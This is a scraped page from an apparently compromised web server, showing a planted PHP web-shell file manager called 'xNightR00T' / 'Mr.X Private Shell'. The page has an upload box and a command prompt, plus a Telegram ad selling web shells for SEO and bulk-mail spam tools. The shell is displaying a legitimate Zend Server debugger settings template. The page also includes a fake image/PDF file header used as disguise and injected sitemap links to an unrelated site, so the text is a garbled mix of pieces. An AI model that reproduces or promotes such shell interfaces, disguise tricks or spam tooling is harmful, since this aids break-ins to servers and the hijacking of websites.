xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<page-header title="Debugger" description="
             Zend Server provides built-in components which allow developers to easily and securely
             debug and profile PHP applications in development and production environments using an IDE.
             Using the integration between Zend Server and the IDE, you will also be able to export
             code traces and view monitoring events in the IDE.
             " read-more-link="{{helpLinkService.get('setting_up_debugging')}}"></page-header>

<div class="settings-form-wrapper bordered-form">
    <form method="POST" name="debugger-settings" id="debugger-settings" ng-submit="save()">
        <fieldset id="section_wrapper_debugger" class="fix" ng-disabled="isSaving || isLoading || !aclService.isAllowed('route:StudioWebApi', 'debuggerSettings')">
            <h3 id="section_debugger">Debugger</h3>
            <p class="section_description">Select the preferred debugger for debugging on Zend Server</p>
            <div class="form-row"><span class="zform-label zform-label-radio zform-wide"></span>
                <span class="zform-element zform-element-radio zform-wide">
                    <div class="value_option_wrapper">
                        <label for="choose-debugger-zend">
                            <input ng-if="phpVersion !== '7.4'" id="choose-debugger-zend" ng-model="settings.activeDebugger" type="radio" value="Zend Debugger" name="ActiveDebugger" title="An advanced PHP debugger developed by Zend Technologies. The ideal debugger for Zend Studio users.">
                            <input ng-if="phpVersion === '7.4'" disabled="disabled" type="radio" value="none" name="ActiveDebugger" title="Zend Debugger is not supported in PHP 7.4">
                            Zend Debugger
                        </label>
                        <p ng-if="phpVersion !== '7.4'">An advanced PHP debugger developed by Zend Technologies. The ideal debugger for Zend Studio users.</p>
                        <p ng-if="phpVersion === '7.4'" class="alert-warning">Zend Debugger is not supported in PHP 7.4</p>
                    </div>
                    <div class="value_option_wrapper">
                        <label for="choose-debugger-xdebug">
                            <input id="choose-debugger-xdebug" ng-model="settings.activeDebugger" type="radio" value="xdebug" name="ActiveDebugger" title="Popular PHP extension for debugging and profiling. Uses the DBGp debugging protocol.">
                            Xdebug
                        </label>
                        <p>Popular PHP extension for debugging and profiling. Uses the DBGp debugging protocol.</p>
                    </div>
                    <div class="value_option_wrapper">
                        <label for="choose-debugger-none">
                            <input id="choose-debugger-none" ng-model="settings.activeDebugger" type="radio" value="none" name="ActiveDebugger" title="Disables debuggers">
                            None
                        </label>
                        <p>Disables debuggers</p>
                    </div>
                </span>
            </div>
        </fieldset>
        <!-- ZEND DEBUGGER -->
        <fieldset class="fix" ng-disabled="isSaving || isLoading || !aclService.isAllowed('route:StudioWebApi', 'debuggerSettings')" id="section_wrapper_security" ng-show="settings.activeDebugger === 'Zend Debugger'">
            <h3 id="section_security">Security</h3>
            <p class="section_description">Define the IP addresses that are allowed, and forbidden, to debug PHP on Zend Server</p>
            <div class="form-row">
                <span class="zform-label"><label>Allow from all</label></span>
                <span class="zform-element">
                    <checkbox-slider ng-disabled="!aclService.isAllowed('route:StudioWebApi', 'debuggerSettings')" ng-model="settings.studioAllowFromAll"></checkbox-slider>
                </span>
                <p>Enable access from any host</p>
            </div>
            <div class="form-row" ng-if="settings.studioAllowFromAll != 1">
                <span class="zform-label">
                    <label for="studioAllowedHostsList">Allowed hosts</label>
                </span>
                <span class="zform-element">
                    <div class="hosts_list-controls">
                        <ip-ranges ng-model="settings.studioAllowedHostsList"></ip-ranges>
                    </div>
                </span>
            </div>
            <div class="form-row" ng-if="settings.studioAllowFromAll != 1">
                <span class="zform-label">
                    <label for="studioDeniedHostsList">Denied hosts</label>
                </span>
                <span class="zform-element">
                    <div class="hosts_list-controls">
                        <ip-ranges ng-model="settings.studioDeniedHostsList"></ip-ranges>
                    </div>
                </span>
            </div>
        </fieldset>
        <fieldset class="fix" ng-disabled="isSaving || isLoading || !aclService.isAllowed('route:StudioWebApi', 'debuggerSettings')" id="section_wrapper_ide_client_settings"  ng-show="settings.activeDebugger === 'Zend Debugger'">
            <h3 id="section_ide_client_settings">IDE Client Settings</h3>
            <p class="section_description">Determine whether Zend Server should automatically detect the IP of the machine hosting your IDE and initiating debugging sessions.</p>
            <div class="form-row">
                <span class="zform-element">
                    <input type="checkbox" ng-model="settings.studioAutoDetection" name="studioAutoDetection" id="studio-autodetect-true" ng-false-value="0" ng-true-value="1">
                </span>
                <span class="zform-label">
                    <label for="studio-autodetect-true">Autodetect IDE settings</label>
                </span>
            </div>
            <div class="section_sub" ng-show="!settings.studioAutoDetection">
                <div class="form-row">
                    <span class="zform-label">
                        <label for="studio-host">IDE Hostname / IP address</label>
                    </span>
                    <span class="zform-element">
                        <input ng-model="settings.studioHost" name="studioHost" id="studio-host" ng-disabled="settings.studioAutoDetectionEnabled">
                    </span>
                </div>
                <div class="form-row">
                    <span class="zform-element">
                        <input type="checkbox" ng-model="settings.studioAutoDetectionEnabled" name="studioAutoDetectionEnabled" id="studio-autoDetectBrowser"  ng-false-value="0" ng-true-value="1">
                    </span>
                    <span class="zform-label">
                        <label for="studio-autoDetectBrowser">Use browser's IP Address</label>
                    </span>
                </div>
                <div class="form-row">
                    <span class="zform-label">
                        <label for="studio-port">Studio port</label>
                    </span>
                    <span class="zform-element">
                        <input type="number" ng-model="settings.studioPort" name="studioPort" id="studio-port">
                    </span>
                </div>
                <div class="form-row">
                    <span class="zform-element">
                        <input type="checkbox" ng-model="settings.studioUseSsl" name="studioUseSsl" id="studio-useSsl" ng-false-value="0" ng-true-value="1">
                    </span>
                    <span class="zform-label">
                        <label for="studio-useSsl">Encrypt communications using SSL</label>
                    </span>
                </div>
            </div>
        </fieldset>
        <fieldset class="fix" ng-disabled="isSaving || isLoading || !aclService.isAllowed('route:StudioWebApi', 'debuggerSettings')" id="section_wrapper_ide_integration_settings"  ng-show="settings.activeDebugger === 'Zend Debugger'">
            <h3 id="section_ide_integration_settings">IDE Integration Settings</h3>
            <p class="section_description">Configure IDE debugging settings. These settings are the default debugger settings, but can be overriden from your IDE.</p>
            <div class="form-row">
                <span class="zform-element">
                    <input type="checkbox" ng-model="settings.studioBreakOnFirstLine" name="studioBreakOnFirstLine" id="studio-break-on-first-line" ng-false-value="0" ng-true-value="1">
                </span>
                <span class="zform-label">
                    <label for="studio-break-on-first-line">Stops debugging execution at the first line of code in the page.</label>
                </span>
            </div>
            <div class="form-row">
                <span class="zform-element">
                    <input type="checkbox" ng-model="settings.studioUseRemote" name="studioUseRemote" id="studio-use-remote" ng-false-value="0" ng-true-value="1">
                </span>
                <span class="zform-label">
                    <label for="studio-use-remote">Debugs the files stored on your file system if they are available. If not, debugs the files located on the web server.</label>
                </span>
            </div>
        </fieldset>
        <!-- XDEBUG -->
        <fieldset class="fix" ng-disabled="isSaving || isLoading || !aclService.isAllowed('route:StudioWebApi', 'debuggerSettings')" id="section_wrapper_xdebug_settings" ng-show="settings.activeDebugger === 'xdebug'">
            <h3 id="section_xdebug_settings">Xdebug Settings</h3>
            <p class="section_description">Settings for using Xdebug as preferred debugger</p>
            <div class="form-row">
                <span class="zform-element">
                    <input type="checkbox" ng-model="settings.remote_enable" name="remote_enable" id="xdebug-remote-enable" title="Enable debugging on Zend Server from an IDE hosted on a remote machine."  ng-false-value="0" ng-true-value="1">
                </span>
                <span class="zform-label">
                    <label for="xdebug-remote-enable">Enable remote</label>
                </span>
                <p>Enable debugging on Zend Server from an IDE hosted on a remote machine.</p>
            </div>
            <div class="form-row">
                <span class="zform-label">
                    <label for="remote_handler">Remote handler</label>
                </span>
                <span class="zform-element">
                    <input ng-model="settings.remote_handler" name="remote_handler" id="remote_handler" title="Enter the remote debugging handler (&amp;quot;php3&amp;quot;, &amp;quot;gdb&amp;quot;, or &amp;quot;dbgp&amp;quot;). Note: xdebug 2.1 and higher supports only &amp;quot;dbgp&amp;quot; protocol.">
                </span>
                <p>Enter the remote debugging handler ("php3", "gdb", or "dbgp"). Note: xdebug 2.1 and higher supports only "dbgp" protocol.</p>
            </div>
            <div class="form-row">
                <span class="zform-label">
                    <label for="remote_host">Remote host</label>
                </span>
                <span class="zform-element">
                    <input ng-model="settings.remote_host" name="remote_host" id="remote_host" title="Enter the hostname / IP of the machine hosting your IDE.">
                </span>
                <p>Enter the IP of the machine hosting your IDE.</p>
            </div>
            <div class="form-row">
                <span class="zform-label">
                    <label for="remote_port">Enable remote</label>
                </span>
                <span class="zform-element">
                    <input type="number" ng-model="settings.remote_port" name="remote_port" id="remote_port" min="1" title="Enter the port to which Xdebug tries to connect on the remote host.">
                </span>
                <p>Enter the port to which Xdebug tries to connect on the remote host.</p>
            </div>
            <div class="form-row">
                <span class="zform-label">
                    <label for="idekey">IDE Key</label>
                </span>
                <span class="zform-element">
                    <input ng-model="settings.idekey" name="idekey" id="idekey" title="Controls which IDE Key Xdebug should pass on to the DBGp debugger handler.">
                </span>
                <p>Controls which IDE Key Xdebug should pass on to the DBGp debugger handler.</p>
            </div>
        </fieldset>
    </form>
    <div class="form-row submit-button-row">
        <a class="btn btn-blue" id="access-tokens-form-submit" ng-disabled="isSaving || isLoading || !aclService.isAllowed('route:StudioWebApi', 'debuggerSettings')" ng-click="save()" ng-switch="isSaving">
            <span ng-switch-default>Save and Restart Zend Server</span>
            <span  ng-switch-when="true"><i class="fa fa-spinner fa-spin"></i> Saving...</span>
        </a>
    </div>
</div>

Filemanager

Name Type Size Permission Actions
debugger.html File 13.04 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml